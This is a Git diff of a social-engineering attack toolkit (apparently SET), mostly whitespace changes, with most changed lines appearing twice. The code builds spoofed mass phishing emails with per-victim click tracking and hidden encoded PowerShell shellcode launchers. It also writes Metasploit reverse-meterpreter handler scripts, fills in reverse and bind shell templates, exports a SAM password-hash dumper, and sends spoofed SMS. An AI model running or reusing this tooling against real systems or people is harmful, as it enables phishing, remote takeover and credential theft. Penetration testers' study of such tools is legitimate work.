# need to do this if we aren't in the SET root
if "program_junk" in definepath:
definepath = definepath.replace("src/program_junk/web_clone", "")
definepath = definepath.replace("src/program_junk/web_clone", "")
sendmail_file=file("%s/config/set_config" % (definepath),"r").readlines()
for line in sendmail_file:
# strip carriage returns
line=line.rstrip()
match=re.search("SENDMAIL=",line)
if match:
# if match and if line is flipped on continue on
if line == ("SENDMAIL=ON"):
print_info("Sendmail is a Linux based SMTP Server, this can be used to spoof email addresses.")
print_info("Sendmail can take up to three minutes to start")
print_status("Sendmail is set to ON")
sendmail_choice = yesno_prompt(["1"], "Start Sendmail? [yes|no]")
# if yes, then do some good stuff
if sendmail_choice == "YES":
print_info("Sendmail can take up to 3-5 minutes to start")
if os.path.isfile("/etc/init.d/sendmail"):
subprocess.Popen("/etc/init.d/sendmail start", shell=True).wait()
if not os.path.isfile("/etc/init.d/sendmail"):
pause = raw_input("[!] Sendmail was not found. Try again and restart.")
sys.exit()
smtp = ("localhost")
port = ("25")
# Flip sendmail switch to get rid of some questions
sendmail=1
# just throw user and password to blank, needed for defining below
user=''
pwd=''
# strip carriage returns
line=line.rstrip()
match=re.search("SENDMAIL=",line)
if match:
# if match and if line is flipped on continue on
if line == ("SENDMAIL=ON"):
print_info("Sendmail is a Linux based SMTP Server, this can be used to spoof email addresses.")
print_info("Sendmail can take up to three minutes to start")
print_status("Sendmail is set to ON")
sendmail_choice = yesno_prompt(["1"], "Start Sendmail? [yes|no]")
# if yes, then do some good stuff
if sendmail_choice == "YES":
print_info("Sendmail can take up to 3-5 minutes to start")
if os.path.isfile("/etc/init.d/sendmail"):
subprocess.Popen("/etc/init.d/sendmail start", shell=True).wait()
if not os.path.isfile("/etc/init.d/sendmail"):
pause = raw_input("[!] Sendmail was not found. Try again and restart.")
sys.exit()
smtp = ("localhost")
port = ("25")
# Flip sendmail switch to get rid of some questions
sendmail=1
# just throw user and password to blank, needed for defining below
user=''
pwd=''
# Search for SMTP provider we will be using
match1=re.search("EMAIL_PROVIDER=", line)
if match1:
# Search for SMTP provider we will be using
match1=re.search("EMAIL_PROVIDER=", line)
if match1:
# if we hit on EMAIL PROVIDER
email_provider=line.replace("EMAIL_PROVIDER=", "").lower()
# if we hit on EMAIL PROVIDER
email_provider=line.replace("EMAIL_PROVIDER=", "").lower()
# support smtp for gmail
if email_provider == "gmail":
if sendmail == 0:
smtp = ("smtp.gmail.com")
port = ("587")
# support smtp for gmail
if email_provider == "gmail":
if sendmail == 0:
smtp = ("smtp.gmail.com")
port = ("587")
# support smtp for yahoo
if email_provider == "yahoo":
if sendmail == 0:
smtp = ("smtp.mail.yahoo.com")
port = ("25")
# support smtp for yahoo
if email_provider == "yahoo":
if sendmail == 0:
smtp = ("smtp.mail.yahoo.com")
port = ("25")
# support smtp for hotmail
if email_provider == "hotmail":
if sendmail == 0:
smtp = ("smtp.hotmail.com")
port = ("25")
# support smtp for hotmail
if email_provider == "hotmail":
if sendmail == 0:
smtp = ("smtp.hotmail.com")
port = ("25")
print ("""
Social Engineer Toolkit Mass E-Mailer
@ -100,135 +100,135 @@ print ("""
1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
99. Return to main menu.
""")
option1=raw_input(setprompt(["5"], ""))
if option1 == 'exit':
exit_set()
exit_set()
# single email
if option1 == '1':
to = raw_input(setprompt(["1"], "Send email to"))
to = raw_input(setprompt(["1"], "Send email to"))
# mass emailer
if option1 == '2':
print ("""
The mass emailer will allow you to send emails to multiple
individuals in a list. The format is simple, it will email
based off of a line. So it should look like the following:
print ("""
The mass emailer will allow you to send emails to multiple
individuals in a list. The format is simple, it will email
based off of a line. So it should look like the following:
john.doe@ihazemail.com
jane.doe@ihazemail.com
wayne.doe@ihazemail.com
john.doe@ihazemail.com
jane.doe@ihazemail.com
wayne.doe@ihazemail.com
This will continue through until it reaches the end of the
file. You will need to specify where the file is, for example
if its in the SET folder, just specify filename.txt (or whatever
it is). If its somewhere on the filesystem, enter the full path,
for example /home/relik/ihazemails.txt
""")
filepath = raw_input(setprompt(["1"], "Path to the file to import into SET"))
if not os.path.isfile(filepath):
while 1:
print "[!] File not found! Please try again and enter the FULL path to the file."
filepath = raw_input(setprompt(["1"], "Path to the file to import into SET"))
if os.path.isfile(filepath):
break
This will continue through until it reaches the end of the
file. You will need to specify where the file is, for example
if its in the SET folder, just specify filename.txt (or whatever
it is). If its somewhere on the filesystem, enter the full path,
for example /home/relik/ihazemails.txt
""")
filepath = raw_input(setprompt(["1"], "Path to the file to import into SET"))
if not os.path.isfile(filepath):
while 1:
print "[!] File not found! Please try again and enter the FULL path to the file."
filepath = raw_input(setprompt(["1"], "Path to the file to import into SET"))
if os.path.isfile(filepath):
break
# exit mass mailer menu
if option1 == '99':
print "Returning to main menu..."
sys.exit(1)
print ("""\n 1. Use a %s Account for your email attack.\n 2. Use your own server or open relay\n""" % (email_provider))
if option1 == '99':
print "Returning to main menu..."
sys.exit(1)
print ("""\n 1. Use a %s Account for your email attack.\n 2. Use your own server or open relay\n""" % (email_provider))
relay = raw_input(setprompt(["1"], ""))
counter=0
# Specify mail Option Here
if relay == '1':
user = raw_input(setprompt(["1"], "Your %s email address" % (email_provider)))
from_address = raw_input(setprompt(["1"], "The FROM NAME the user will see"))
user1 = user
pwd = getpass.getpass("Email password: ")
user = raw_input(setprompt(["1"], "Your %s email address" % (email_provider)))
from_address = raw_input(setprompt(["1"], "The FROM NAME the user will see"))
user1 = user
pwd = getpass.getpass("Email password: ")
# Specify Open-Relay Option Here
if relay == '2':
user1 = raw_input(setprompt(["1"], "From address (ex: moo@example.com)"))
from_address = raw_input(setprompt(["1"], "The FROM NAME the user will see"))
if sendmail==0:
user = raw_input(setprompt(["1"], "Username for open-relay [blank]"))
pwd = getpass.getpass("Password for open-relay [blank]: ")
user1 = raw_input(setprompt(["1"], "From address (ex: moo@example.com)"))
from_address = raw_input(setprompt(["1"], "The FROM NAME the user will see"))
if sendmail==0:
user = raw_input(setprompt(["1"], "Username for open-relay [blank]"))
pwd = getpass.getpass("Password for open-relay [blank]: ")
if sendmail==0:
smtp = raw_input(setprompt(["1"], "SMTP email server address (ex. smtp.youremailserveryouown.com)"))
port = raw_input(setprompt(["1"], "Port number for the SMTP server [25]"))
if port == "":
port = ("25")
if sendmail==0:
smtp = raw_input(setprompt(["1"], "SMTP email server address (ex. smtp.youremailserveryouown.com)"))
port = raw_input(setprompt(["1"], "Port number for the SMTP server [25]"))
if port == "":
port = ("25")
# specify if its a high priority or not
highpri=yesno_prompt(["1"], "Flag this message/s as high priority? [yes|no]")
if not "YES" in highpri:
prioflag1 = ""
prioflag2 = ""
prioflag1 = ""
prioflag2 = ""
else:
prioflag1 = ' 1 (Highest)'
prioflag2 = ' High'
prioflag1 = ' 1 (Highest)'
prioflag2 = ' High'
subject=raw_input(setprompt(["1"], "Email subject"))
try:
html_flag=raw_input(setprompt(["1"], "Send the message as html or plain? 'h' or 'p' [p]"))
html_flag=raw_input(setprompt(["1"], "Send the message as html or plain? 'h' or 'p' [p]"))
# if we are specifying plain or defaulting to plain
if html_flag == "" or html_flag == "p":
message_flag="plain"
# if we are specifying html
if html_flag == "h":
message_flag="html"
# start the body off blank
body = ""
## Here we start to check if we want to track users when they click
## essentially if this flag is turned on, a quick search and replace
## occurs via base64 encoding on the user name. that is then added
## during the def mail function call and the username is posted as
## part of the URL. When we check the users, they can be coorelated
## back to the individual user when they click the link.
# if we are specifying plain or defaulting to plain
if html_flag == "" or html_flag == "p":
message_flag="plain"
# if we are specifying html
if html_flag == "h":
message_flag="html"
# start the body off blank
body = ""
## Here we start to check if we want to track users when they click
## essentially if this flag is turned on, a quick search and replace
## occurs via base64 encoding on the user name. that is then added
## during the def mail function call and the username is posted as
## part of the URL. When we check the users, they can be coorelated
## back to the individual user when they click the link.
# track email is pulled dynamically from the config as TRACK_EMAIL_ADDRESSES
if track_email.lower() == "on":
print "You have specified to track user email accounts when they are sent. In"
print "order for this to work, you will need to specify the URL within the body"
print "of the email and where you would like to inject the base64 encoded name."
print "\nWhen a user clicks on the link, the URL Will post back to SET and track"
print "each of the users clicks and who the user was. As an example, say my SET"
print "website is hosted at http://www.trustedsec.com/index.php and I want to track users."
print "I would type below " + bcolors.BOLD + "http://www.trustedsec.com/index.php?INSERTUSERHERE" + bcolors.ENDC + ". Note that in"
print "order for SET to work, you will need to specify index.php?INSERTUSERHERE. That is the"
print "keyword that SET uses in order to replace the base name with the URL."
print "\nInsert the FULL url and the " + bcolors.BOLD + "INSERTUSERHERE" + bcolors.ENDC + "on where you want to insert the base64 name.\n\nNOTE: You must have a index.php and a ? mark seperating the user. YOU MUST USE PHP!"
print "\nNote that the actual URL does NOT need to contain index.php but has to be named that for the php code in Apache to work."
body=raw_input(setprompt(["1"], "Enter the body of the message, hit return for a new line. Control+c when finished"))
# track email is pulled dynamically from the config as TRACK_EMAIL_ADDRESSES
if track_email.lower() == "on":
print "You have specified to track user email accounts when they are sent. In"
print "order for this to work, you will need to specify the URL within the body"
print "of the email and where you would like to inject the base64 encoded name."
print "\nWhen a user clicks on the link, the URL Will post back to SET and track"
print "each of the users clicks and who the user was. As an example, say my SET"
print "website is hosted at http://www.trustedsec.com/index.php and I want to track users."
print "I would type below " + bcolors.BOLD + "http://www.trustedsec.com/index.php?INSERTUSERHERE" + bcolors.ENDC + ". Note that in"
print "order for SET to work, you will need to specify index.php?INSERTUSERHERE. That is the"
print "keyword that SET uses in order to replace the base name with the URL."
print "\nInsert the FULL url and the " + bcolors.BOLD + "INSERTUSERHERE" + bcolors.ENDC + "on where you want to insert the base64 name.\n\nNOTE: You must have a index.php and a ? mark seperating the user. YOU MUST USE PHP!"
print "\nNote that the actual URL does NOT need to contain index.php but has to be named that for the php code in Apache to work."
body=raw_input(setprompt(["1"], "Enter the body of the message, hit return for a new line. Control+c when finished"))
# loop through until they are finished with the body of the subject line
while body != 'exit':
try:
# loop through until they are finished with the body of the subject line
while body != 'exit':
try:
body+=("\n")
body+=raw_input("Next line of the body: ")
body+=("\n")
body+=raw_input("Next line of the body: ")
# except KeyboardInterrupts (control-c) and pass through.
except KeyboardInterrupt:
break
# except KeyboardInterrupts (control-c) and pass through.
except KeyboardInterrupt:
break
# if we are tracking emails, this is some cleanup and detection to see if they entered .html instead or didn't specify insertuserhere
if track_email.lower() == "on":
# here we replace url with .php if they made a mistake
body = body.replace(".html", ".php")
if not "?INSERTUSERHERE" in body:
print_error("You have track email to on however did not specify ?INSERTUSERHERE.")
print_error("Tracking of users will not work and is disabled. Please re-read the instructions.")
pause = raw_input("Press {" + bcolors.BOLD + "return" + bcolors.ENDC + "} to continue.")
# if we are tracking emails, this is some cleanup and detection to see if they entered .html instead or didn't specify insertuserhere
if track_email.lower() == "on":
# here we replace url with .php if they made a mistake
body = body.replace(".html", ".php")
if not "?INSERTUSERHERE" in body:
print_error("You have track email to on however did not specify ?INSERTUSERHERE.")
print_error("Tracking of users will not work and is disabled. Please re-read the instructions.")
pause = raw_input("Press {" + bcolors.BOLD + "return" + bcolors.ENDC + "} to continue.")
# except KeyboardInterrupts (control-c) and pass through.
@ -237,77 +237,77 @@ except KeyboardInterrupt:
def mail(to, subject, prioflag1, prioflag2, text):
msg = MIMEMultipart()
msg['From'] = from_address
msg['To'] = to
msg['X-Priority'] = prioflag1
msg['X-MSMail-Priority'] = prioflag2
msg['Subject'] = subject
msg = MIMEMultipart()
msg['From'] = from_address
msg['To'] = to
msg['X-Priority'] = prioflag1
msg['X-MSMail-Priority'] = prioflag2
msg['Subject'] = subject
body_type=MIMEText(text, "%s" % (message_flag))
msg.attach(body_type)
body_type=MIMEText(text, "%s" % (message_flag))
msg.attach(body_type)
mailServer = smtplib.SMTP(smtp, port)
mailServer = smtplib.SMTP(smtp, port)
if sendmail == 0:
if sendmail == 0:
if email_provider == "gmail":
try:
mailServer.starttls()
except:
pass
mailServer.ehlo()
if email_provider == "gmail":
try:
mailServer.starttls()
except:
pass
mailServer.ehlo()
else: mailServer.ehlo()
else: mailServer.ehlo()
try:
if user != "" or pwd != "":
mailServer.login(user, pwd)
mailServer.sendmail(user, to, msg.as_string())
try:
if user != "" or pwd != "":
mailServer.login(user, pwd)
mailServer.sendmail(user, to, msg.as_string())
except:
# try logging in with base64 encoding here
import base64
try:
mailServer.docmd("AUTH LOGIN", base64.b64encode(user))
mailServer.docmd(base64.b64encode(pwd), "")
except:
# try logging in with base64 encoding here
import base64
try:
mailServer.docmd("AUTH LOGIN", base64.b64encode(user))
mailServer.docmd(base64.b64encode(pwd), "")
# except exceptions and print incorrect passowrd
except Exception, e:
print_warning("It appears your password was incorrect.\nPrinting response: "+(str(e)))
return_continue()
# except exceptions and print incorrect passowrd
except Exception, e:
print_warning("It appears your password was incorrect.\nPrinting response: "+(str(e)))
return_continue()
if sendmail == 1:
mailServer.sendmail,(user, to, msg.as_string())
if sendmail == 1:
mailServer.sendmail,(user, to, msg.as_string())
# if we specified a single address
if option1 == '1':
# re-assign body to temporary variable to not overwrite original body
body_new = body
## if we specify to track users, this will replace the INSERTUSERHERE with the "TO" field.
if track_email.lower() == "on":
body_new = body_new.replace("INSERTUSERHERE", base64.b64encode(to))
# call the function to send email
mail(to,subject,prioflag1,prioflag2,body_new)
# re-assign body to temporary variable to not overwrite original body
body_new = body
## if we specify to track users, this will replace the INSERTUSERHERE with the "TO" field.
if track_email.lower() == "on":
body_new = body_new.replace("INSERTUSERHERE", base64.b64encode(to))
# call the function to send email
mail(to,subject,prioflag1,prioflag2,body_new)
# if we specified the mass mailer for multiple users
if option1 == '2':
email_num=0
fileopen=file(filepath, "r").readlines()
for line in fileopen:
to = line.rstrip()
# re-assign body to temporary variable to not overwrite original body
body_new = body
## if we specify to track users, this will replace the INSERTUSERHERE with the "TO" field.
if track_email.lower() == "on":
body_new = body_new.replace("INSERTUSERHERE", base64.b64encode(to))
# send the actual email
time_delay = check_config("TIME_DELAY_EMAIL=").lower()
time.sleep(int(time_delay))
mail(to,subject,prioflag1,prioflag2,body_new)
email_num=email_num+1
# simply print the statement
print_status("Sent e-mail number: " + (str(email_num)) + " to address: " + to)
email_num=0
fileopen=file(filepath, "r").readlines()
for line in fileopen:
to = line.rstrip()
# re-assign body to temporary variable to not overwrite original body
body_new = body
## if we specify to track users, this will replace the INSERTUSERHERE with the "TO" field.
if track_email.lower() == "on":
body_new = body_new.replace("INSERTUSERHERE", base64.b64encode(to))
# send the actual email
time_delay = check_config("TIME_DELAY_EMAIL=").lower()
time.sleep(int(time_delay))
mail(to,subject,prioflag1,prioflag2,body_new)
email_num=email_num+1
# simply print the statement
print_status("Sent e-mail number: " + (str(email_num)) + " to address: " + to)
# finish up here
print_status("SET has finished sending the emails")

224
src/powershell/powershell.py
View file

@ -15,121 +15,121 @@ show_powershell_menu = create_menu(text.powershell_text, text.powershell_menu)
powershell_menu_choice = raw_input(setprompt(["29"], ""))
if powershell_menu_choice != "99":
# specify ipaddress of reverse listener
ipaddr = grab_ipaddress()
update_options("IPADDR=" + ipaddr)
# specify ipaddress of reverse listener
ipaddr = grab_ipaddress()
update_options("IPADDR=" + ipaddr)
# if we select alphanumeric shellcode
if powershell_menu_choice == "1":
print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
import src.payloads.powershell.prep
# create the directory if it does not exist
if not os.path.isdir("reports/powershell"):
os.makedirs("reports/powershell")
# if we select alphanumeric shellcode
if powershell_menu_choice == "1":
# here we format everything for us
x64 = file("src/program_junk/x64.powershell", "r")
x64 = x64.read()
x64 = "powershell -noprofile -windowstyle hidden -noninteractive -EncodedCommand " + x64
x86 = file("src/program_junk/x86.powershell", "r")
x86 = x86.read()
x86 = "powershell -noprofile -windowstyle hidden -noninteractive -EncodedCommand " + x86
print_status("If you want the powershell commands and attack, they are exported to reports/powershell/")
filewrite = file("reports/powershell/x64_powershell_injection.txt", "w")
filewrite.write(x64)
filewrite.close()
filewrite = file("reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86)
# grab port specifications
if check_options("PORT=") != 0:
port = check_options("PORT=")
print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
import src.payloads.powershell.prep
# create the directory if it does not exist
if not os.path.isdir("reports/powershell"):
os.makedirs("reports/powershell")
else:
port=raw_input(setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if port == "": port = "443"
update_options("PORT=" + port)
# here we format everything for us
x64 = file("src/program_junk/x64.powershell", "r")
x64 = x64.read()
x64 = "powershell -noprofile -windowstyle hidden -noninteractive -EncodedCommand " + x64
x86 = file("src/program_junk/x86.powershell", "r")
x86 = x86.read()
x86 = "powershell -noprofile -windowstyle hidden -noninteractive -EncodedCommand " + x86
choice = yesno_prompt("0","Do you want to start the listener now [yes/no]: ")
if choice == 'NO':
pass
print_status("If you want the powershell commands and attack, they are exported to reports/powershell/")
filewrite = file("reports/powershell/x64_powershell_injection.txt", "w")
filewrite.write(x64)
filewrite.close()
filewrite = file("reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86)
# if we want to start the listener
if choice == 'YES':
victim = raw_input(setprompt(["29"], "Select x86 or x64 victim machine [default: x64]"))
if victim == "x86":
filewrite = file("reports/powershell/powershell.rc", "w")
filewrite.write("use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset lport %s\nset LHOST 0.0.0.0\nexploit -j" % (port))
filewrite.close()
else:
filewrite = file("reports/powershell/powershell.rc", "w")
filewrite.write("use multi/handler\nset payload windows/x64/meterpreter/reverse_tcp\nset lport %s\nset LHOST 0.0.0.0\nexploit -j" % (port))
filewrite.close()
msf_path = meta_path()
subprocess.Popen("ruby %s/msfconsole -L -n -r reports/powershell/powershell.rc" % (msf_path), shell=True).wait()
print_status("Powershell files can be found under reports/powershell/")
return_continue()
# if we select powershell reverse shell
if powershell_menu_choice == "2":
# prompt for IP address and port
port = raw_input(setprompt(["29"], "Enter the port for listener [443]"))
# default to 443
if port == "": port = "443"
# open the reverse shell up
print_status("Rewriting the powershell reverse shell with options")
fileopen = file("src/powershell/reverse.powershell", "r")
data = fileopen.read()
data = data.replace("IPADDRHERE", ipaddr)
data = data.replace("PORTHERE", port)
print_status("Exporting the powershell stuff to reports/powershell")
# create the directory if it does not exist
if not os.path.isdir("reports/powershell"):
os.makedirs("reports/powershell")
filewrite = file("reports/powershell/powershell.reverse.txt", "w")
filewrite.write(data)
filewrite.close()
choice = yesno_prompt("0","Do you want to start a listener [yes/no]")
if choice == "NO":
print_status("Have netcat or standard socket listener on port %s" % (port))
if choice == "YES":
socket_listener(port)
return_continue()
# grab port specifications
if check_options("PORT=") != 0:
port = check_options("PORT=")
# if we select powershell bind shell
if powershell_menu_choice == "3":
port = raw_input(setprompt(["29"], "Enter the port for listener [443]"))
# open file
fileopen = file("src/powershell/bind.powershell", "r")
data = fileopen.read()
data = data.replace("PORTHERE", port)
# create the directory if it does not exist
if not os.path.isdir("reports/powershell"):
os.makedirs("reports/powershell")
filewrite = file("reports/powershell/powershell.bind.txt", "w")
filewrite.write(data)
filewrite.close()
print_status("The powershell program has been exported to reports/powershell/")
return_continue()
# if we select powershell powerdump SAM dump
if powershell_menu_choice == "4":
# create the directory if it does not exist
if not os.path.isdir("reports/powershell"):
os.makedirs("reports/powershell")
# copy file
if os.path.isfile("src/powershell/powerdump.encoded"):
shutil.copyfile("src/powershell/powerdump.encoded", "reports/powershell/powerdump.encoded.txt")
print_status("The powershell program has been exported to reports/powershell/")
print_status("Note with PowerDump -- You MUST be running as SYSTEM when executing.")
return_continue()
else:
port=raw_input(setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if port == "": port = "443"
update_options("PORT=" + port)
choice = yesno_prompt("0","Do you want to start the listener now [yes/no]: ")
if choice == 'NO':
pass
# if we want to start the listener
if choice == 'YES':
victim = raw_input(setprompt(["29"], "Select x86 or x64 victim machine [default: x64]"))
if victim == "x86":
filewrite = file("reports/powershell/powershell.rc", "w")
filewrite.write("use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset lport %s\nset LHOST 0.0.0.0\nexploit -j" % (port))
filewrite.close()
else:
filewrite = file("reports/powershell/powershell.rc", "w")
filewrite.write("use multi/handler\nset payload windows/x64/meterpreter/reverse_tcp\nset lport %s\nset LHOST 0.0.0.0\nexploit -j" % (port))
filewrite.close()
msf_path = meta_path()
subprocess.Popen("ruby %s/msfconsole -L -n -r reports/powershell/powershell.rc" % (msf_path), shell=True).wait()
print_status("Powershell files can be found under reports/powershell/")
return_continue()
# if we select powershell reverse shell
if powershell_menu_choice == "2":
# prompt for IP address and port
port = raw_input(setprompt(["29"], "Enter the port for listener [443]"))
# default to 443
if port == "": port = "443"
# open the reverse shell up
print_status("Rewriting the powershell reverse shell with options")
fileopen = file("src/powershell/reverse.powershell", "r")
data = fileopen.read()
data = data.replace("IPADDRHERE", ipaddr)
data = data.replace("PORTHERE", port)
print_status("Exporting the powershell stuff to reports/powershell")
# create the directory if it does not exist
if not os.path.isdir("reports/powershell"):
os.makedirs("reports/powershell")
filewrite = file("reports/powershell/powershell.reverse.txt", "w")
filewrite.write(data)
filewrite.close()
choice = yesno_prompt("0","Do you want to start a listener [yes/no]")
if choice == "NO":
print_status("Have netcat or standard socket listener on port %s" % (port))
if choice == "YES":
socket_listener(port)
return_continue()
# if we select powershell bind shell
if powershell_menu_choice == "3":
port = raw_input(setprompt(["29"], "Enter the port for listener [443]"))
# open file
fileopen = file("src/powershell/bind.powershell", "r")
data = fileopen.read()
data = data.replace("PORTHERE", port)
# create the directory if it does not exist
if not os.path.isdir("reports/powershell"):
os.makedirs("reports/powershell")
filewrite = file("reports/powershell/powershell.bind.txt", "w")
filewrite.write(data)
filewrite.close()
print_status("The powershell program has been exported to reports/powershell/")
return_continue()
# if we select powershell powerdump SAM dump
if powershell_menu_choice == "4":
# create the directory if it does not exist
if not os.path.isdir("reports/powershell"):
os.makedirs("reports/powershell")
# copy file
if os.path.isfile("src/powershell/powerdump.encoded"):
shutil.copyfile("src/powershell/powerdump.encoded", "reports/powershell/powerdump.encoded.txt")
print_status("The powershell program has been exported to reports/powershell/")
print_status("Note with PowerDump -- You MUST be running as SYSTEM when executing.")
return_continue()

24
src/qrcode/qrgenerator.py
View file

@ -2,16 +2,16 @@ from src.qrcode.qrcode import *
from src.core.setcore import *
import os
# generate the qrcode and save it definition
# generate the qrcode and save it definition
def gen_qrcode(url):
# generate the qrcode
qr = QRCode(5, QRErrorCorrectLevel.L)
qr.addData(url)
qr.make()
im = qr.makeImage()
time.sleep(1)
if os.path.isfile("reports/qrcode_attack.png"): os.remove("reports/qrcode_attack.png")
# save the image out
im.save("reports/qrcode_attack.png", format='png')
# print that its been successful
print_status("[*] QRCode has been generated under reports/qrcode_attack.png!")
# generate the qrcode
qr = QRCode(5, QRErrorCorrectLevel.L)
qr.addData(url)
qr.make()
im = qr.makeImage()
time.sleep(1)
if os.path.isfile("reports/qrcode_attack.png"): os.remove("reports/qrcode_attack.png")
# save the image out
im.save("reports/qrcode_attack.png", format='png')
# print that its been successful
print_status("[*] QRCode has been generated under reports/qrcode_attack.png!")

9
src/sms/client/SMSProviders.py
View file

@ -11,8 +11,8 @@ def send_sohoos_sms(to, origin, text):
conn = httplib.HTTPConnection('sohoos.com')
conn.request('POST', '/crm/managekit/widget/submitsms', params, headers)
response = conn.getresponse()
if (response.status == 302 and
response.reason == "Found" and
if (response.status == 302 and
response.reason == "Found" and
response.getheader("location") == "/crm/managekit/widget/thankssms"):
print "\nSMS sent\n"
else:
@ -35,7 +35,7 @@ def send_smsgang_sms(to, origin, text, pincode):
conn = httplib.HTTPConnection('www.smsgang.com')
conn.request('POST', '/sendsms.php?langfile=en', params, headers)
response = conn.getresponse()
if (response.status == 200 and
if (response.status == 200 and
re.search("Your SMS was sent", response.read())):
print "\nSMS sent\n"
else:
@ -52,7 +52,7 @@ def send_lleidanet_sms(to, origin, text, user, password, email):
conn = httplib.HTTPConnection('sms.lleida.net')
conn.request('POST', '/xmlapi/smsgw.cgi', params, headers)
response = conn.getresponse()
if (response.status == 200 and
if (response.status == 200 and
re.search("<status>100</status>", response.read())):
print "\nSMS sent\n"
else:
@ -76,4 +76,3 @@ def send_android_emu_sms(origin, text):
print "Try: http://developer.android.com/guide/developing/tools/emulator.html"
except:
print "\nError sending SMS"

2
src/sms/client/custom_sms_template.py
View file

@ -3,7 +3,7 @@ import random
from src.core import setcore as core
try:
print ("\n [****] Custom Template Generator [****]\n")
print ("\n [****] Custom Template Generator [****]\n")
author=raw_input(core.setprompt(["7"], "Name of the author"))
filename=randomgen=random.randrange(1,99999999999999999999)
filename=str(filename)+(".template")

14
src/sms/client/sms_client.py
View file

@ -9,7 +9,7 @@ while 1:
print """
SMS Attack Menu
There are diferent attacks you can launch in the context of SMS spoofing,
There are diferent attacks you can launch in the context of SMS spoofing,
select your own.
1. SMS Attack Single Phone Number
@ -21,7 +21,7 @@ while 1:
if attack_option == 'exit':
core.exit_set()
# exit
# exit
if attack_option == '1':
print("\nSingle SMS Attack")
to = raw_input(core.setprompt(["7"], "Send sms to"))
@ -29,7 +29,7 @@ while 1:
phones.append(to)
sys.path.append("src/sms/client/")
try:
# ugly but "compliant" with SET architecture
# ugly but "compliant" with SET architecture
debug_msg(me,"importing 'src.sms.client.sms_launch'",1)
reload(sms_launch)
sms_launch.phones = phones
@ -37,7 +37,7 @@ while 1:
except:
import sms_launch
sms_launch.phones = phones
sms_launch.launch()
sms_launch.launch()
break
if attack_option == '2':
# TO DO: MASS SMS ATTACK
@ -55,15 +55,15 @@ while 1:
break
sys.path.append("src/sms/client/")
try:
# ugly but "compliant" with SET architecture
# ugly but "compliant" with SET architecture
debug_msg(me,"importing 'src.sms.client.sms_launch'",1)
reload(sms_launch)
sms_launch.phones = phones
sms_launch.launch()
except:
import sms_launch
import sms_launch
sms_launch.phones = phones
sms_launch.launch()
break
if attack_option == '99':
if attack_option == '99':
break

290
src/sms/client/sms_launch.py
View file

@ -7,155 +7,155 @@ import os
from src.core import setcore as core
def launch():
while 1:
print("""
1. Pre-Defined Template
2. One-Time Use SMS
99. Cancel and return to SMS Spoofing Menu
""")
template_choice = raw_input(core.setprompt(["7"], "Use a predefined template or craft a one time SMS?"))
# if predefined template go here
if template_choice == '1':
# set path for
path = 'src/templates/sms/'
filewrite=file("src/program_junk/sms.templates", "w")
counter=0
# Pull all files in the templates directory
for infile in glob.glob(os.path.join(path, '*.template')):
infile=infile.split("/")
# grab just the filename
infile=infile[3]
counter=counter+1
# put it in a format we can use later in a file
filewrite.write(infile+" "+str(counter)+"\n")
# close the file
filewrite.close()
# read in formatted filenames
fileread=file("src/program_junk/sms.templates","r").readlines()
print "Below is a list of available templates:\n"
for line in fileread:
line=line.rstrip()
line=line.split(" ")
filename=line[0]
# read in file
fileread2=file("src/templates/sms/%s" % (filename),"r").readlines()
for line2 in fileread2:
match=re.search("SUBJECT=", line2)
if match:
line2=line2.rstrip()
line2=line2.split("=")
line2=line2[1]
# strip double quotes
line2=line2.replace('"', "")
# display results back
print line[1]+": "+line2
# allow user to select template
choice=raw_input(core.setprompt(["7"], "Select template"))
for line in fileread:
# split based off of space
line=line.split(" ")
# search for the choice
match=re.search(str(choice), line[1])
if match:
extract=line[0]
fileopen=file("src/templates/sms/"+str(extract), "r").readlines()
for line2 in fileopen:
match2=re.search("ORIGIN=", line2)
if match2:
origin=line2.replace('"', "")
origin=origin.split("=")
origin=origin[1]
match3=re.search("SUBJECT=", line2)
if match3:
subject=line2.replace('"', "")
subject=subject.split("=")
subject=subject[1]
match4=re.search("BODY=", line2)
if match4:
body=line2.replace('"', "")
body=body.replace(r'\n', " \n ")
body=body.split("=")
body=body[1]
break;
if template_choice == '2':
try:
origin = raw_input(core.setprompt(["7"], "Source number phone"))
body = raw_input(core.setprompt(["7"], "Body of the message, hit return for a new line. Control+c when finished"))
while body != 'sdfsdfihdsfsodhdsofh':
try:
body+=("\n")
body+=raw_input("Next line of the body: ")
except KeyboardInterrupt: break
except KeyboardInterrupt: pass
break;
if template_choice == '99':
break;
if template_choice != '3':
while 1:
print("""
1. Pre-Defined Template
2. One-Time Use SMS
print("""
Service Selection
99. Cancel and return to SMS Spoofing Menu
There are diferent services you can use for the SMS spoofing, select
your own.
1. SohoOS (buggy)
2. Lleida.net (pay)
3. SMSGANG (pay)
4. Android Emulator (need to install Android Emulator)
99. Cancel and return to SMS Spoofing Menu
""")
template_choice = raw_input(core.setprompt(["7"], "Use a predefined template or craft a one time SMS?"))
# if predefined template go here
if template_choice == '1':
# set path for
path = 'src/templates/sms/'
filewrite=file("src/program_junk/sms.templates", "w")
counter=0
# Pull all files in the templates directory
for infile in glob.glob(os.path.join(path, '*.template')):
infile=infile.split("/")
# grab just the filename
infile=infile[3]
counter=counter+1
# put it in a format we can use later in a file
filewrite.write(infile+" "+str(counter)+"\n")
# close the file
filewrite.close()
# read in formatted filenames
fileread=file("src/program_junk/sms.templates","r").readlines()
print "Below is a list of available templates:\n"
for line in fileread:
line=line.rstrip()
line=line.split(" ")
filename=line[0]
# read in file
fileread2=file("src/templates/sms/%s" % (filename),"r").readlines()
for line2 in fileread2:
match=re.search("SUBJECT=", line2)
if match:
line2=line2.rstrip()
line2=line2.split("=")
line2=line2[1]
# strip double quotes
line2=line2.replace('"', "")
# display results back
print line[1]+": "+line2
service_option = raw_input(core.setprompt(["7"], ""))
# exit
if service_option == '1':
break
if service_option == '2':
break
if service_option == '3':
break
if service_option == '4':
break
if service_option == '99':
break
# allow user to select template
choice=raw_input(core.setprompt(["7"], "Select template"))
for line in fileread:
# split based off of space
line=line.split(" ")
# search for the choice
match=re.search(str(choice), line[1])
if match:
extract=line[0]
fileopen=file("src/templates/sms/"+str(extract), "r").readlines()
